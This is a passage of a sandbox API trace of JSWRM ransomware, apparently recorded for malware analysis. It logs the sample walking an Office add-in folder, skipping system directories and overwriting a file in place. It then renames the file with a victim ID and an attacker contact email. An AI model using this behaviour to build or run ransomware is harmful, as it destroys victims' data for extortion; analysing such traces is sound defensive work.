Size=0x40) returned 0x20d920 [0123.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0123.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241060, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0123.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0123.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.684] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x406102bb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x406102bb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x406102bb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.684] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0123.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0123.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.684] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61d7668, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13070, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.684] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0123.684] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0123.684] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0123.685] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0123.685] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0123.685] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0123.685] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0123.685] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.685] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0123.685] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0123.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0123.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0123.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.685] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0123.685] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0123.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0123.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0123.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0123.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0123.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0123.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0123.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0123.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.686] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42d8c51, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4920, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0123.686] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0123.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0123.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0123.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0123.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0123.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0123.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0123.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0123.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0123.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.687] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133f40a9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f13c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ca.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2=".") returned 1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2="..") returned 1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2="...") returned 1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2="windows") returned -1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2="recovery") returned -1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2="perflogs") returned 1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2="documents and settings") returned 1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2="$RECYCLE.BIN") returned 1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2="system volume information") returned -1 [0123.687] lstrcmpiW (lpString1="PowerViewRes.ca.xap", lpString2="msocache") returned 1 [0123.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ca.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0123.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ca.xap", cchWideChar=19, lpMultiByteStr=0x241308, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ca.xap", lpUsedDefaultChar=0x0) returned 19 [0123.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ca.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0123.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ca.xap", cchWideChar=19, lpMultiByteStr=0x241010, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ca.xap", lpUsedDefaultChar=0x0) returned 19 [0123.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0123.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0123.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0123.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ca\\PowerViewRes.ca.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ca\\powerviewres.ca.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.688] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=323900) returned 1 [0123.688] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0123.688] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0123.705] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.705] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0123.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.706] CloseHandle (hObject=0x338) returned 1 [0123.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0123.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0123.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0123.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.706] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ca\\PowerViewRes.ca.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ca\\powerviewres.ca.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ca\\PowerViewRes.ca.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ca\\powerviewres.ca.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0123.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0123.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0123.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) 